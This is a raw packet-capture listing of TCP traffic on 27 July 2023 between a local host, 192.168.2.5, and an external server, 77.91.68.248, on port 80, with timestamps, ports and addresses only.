Jul 27, 2023 01:33:03.243901014 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243921995 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243957043 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.243964911 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.243993044 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244020939 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244020939 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244026899 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244051933 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244075060 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244097948 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244100094 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244122982 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244139910 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244139910 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244155884 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244183064 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244198084 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244218111 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244235992 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244242907 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244302988 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244303942 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244651079 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244697094 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244729042 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244765997 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244800091 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244817972 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244817972 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244831085 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244863033 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244875908 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244895935 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244930029 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244946003 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.244963884 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.244995117 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245022058 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245028019 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245060921 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245095015 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245126009 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245137930 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245137930 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245162010 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245193958 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245202065 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245202065 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245227098 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245253086 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245260000 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245294094 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245311022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245311022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245326996 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245354891 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245361090 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245390892 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245404959 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245414972 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245443106 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245452881 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245465994 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245488882 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245498896 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245517969 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245527029 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245551109 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245584011 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245596886 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245596886 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245625973 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245671988 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245675087 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245675087 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245697975 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245719910 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245723009 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245743990 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245765924 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245765924 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245767117 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245796919 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245831013 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245837927 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245837927 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245863914 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245877981 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245891094 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245912075 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245913982 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245937109 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245945930 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245945930 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245959997 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.245968103 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.245991945 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246025085 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246036053 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246036053 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246067047 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246098995 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246100903 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246110916 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246126890 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246143103 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246159077 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246191978 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246196032 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246196032 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246223927 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246236086 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246248007 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246272087 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246294022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246294022 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246294975 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246318102 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246325016 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246357918 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246372938 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246372938 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246392012 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246419907 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246436119 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246436119 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246443987 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246468067 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246474028 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246494055 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246495008 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246530056 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246543884 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246543884 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246570110 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246598959 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246601105 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246623039 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246643066 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246646881 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246666908 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246676922 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246710062 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246717930 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246717930 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246742964 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246762991 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246768951 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246790886 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246794939 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246818066 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246831894 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246831894 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246843100 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246864080 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246875048 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246908903 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246925116 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246925116 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246941090 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246964931 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.246972084 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.246989012 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247001886 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247013092 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247029066 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247040033 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247052908 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247071028 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247096062 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247097969 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247126102 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247129917 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247153044 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247160912 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247195005 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247220039 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247220039 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247227907 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247262955 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.247275114 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247275114 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.247385025 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.292879105 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.292912006 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.292998075 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.293190002 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.293226004 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.293256998 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.293303967 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.293303967 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.293308020 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.293334961 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.293373108 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.293385029 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.293385029 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.293414116 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.318125010 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.319540977 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.338823080 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.338875055 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.338926077 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.338926077 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.339205980 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.339327097 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.339349985 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.339358091 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.339387894 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.339415073 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.339478016 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.339478016 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.339478016 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.339482069 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.339566946 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.365468979 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.365520000 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.367208004 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.384779930 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.384825945 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.384860992 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.384893894 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.384893894 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.384955883 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385286093 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385324001 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385358095 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385384083 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385384083 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385409117 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385446072 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385473967 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385488033 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385551929 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385556936 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385586977 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385617971 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385636091 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385636091 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385667086 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385667086 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385674953 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385705948 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.385725021 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385725021 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.385833025 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.411962986 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.412003994 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.412039042 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.412071943 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.412071943 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.412219048 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.429459095 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.429506063 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.429534912 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.429568052 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.429596901 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.429622889 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.429622889 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.429747105 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.429800987 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.429800987 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.429800987 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430059910 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430095911 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430123091 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430124998 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430123091 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430155993 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430185080 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430208921 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430208921 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430208921 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430214882 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430247068 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430274963 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430305004 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430330038 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430330038 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430330038 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430335999 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430366993 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430392981 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430392981 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430392981 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430396080 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430425882 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430454969 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.430478096 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430478096 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.430478096 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.432295084 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.456783056 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.456828117 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.456861019 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.456892014 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.456924915 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.456933975 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.456933975 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.457036972 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.457036972 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.474054098 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474101067 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474128008 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474154949 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474179029 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.474186897 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474216938 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474242926 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474272966 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.474273920 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.474275112 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.474275112 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.474786997 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.474786997 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475393057 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475431919 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475459099 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475485086 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475511074 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475538969 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475538969 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475538969 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475572109 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475600958 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475625992 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475625992 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475625992 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475637913 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475666046 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475691080 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475716114 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475724936 CEST	49725	80	192.168.2.5	77.91.68.248
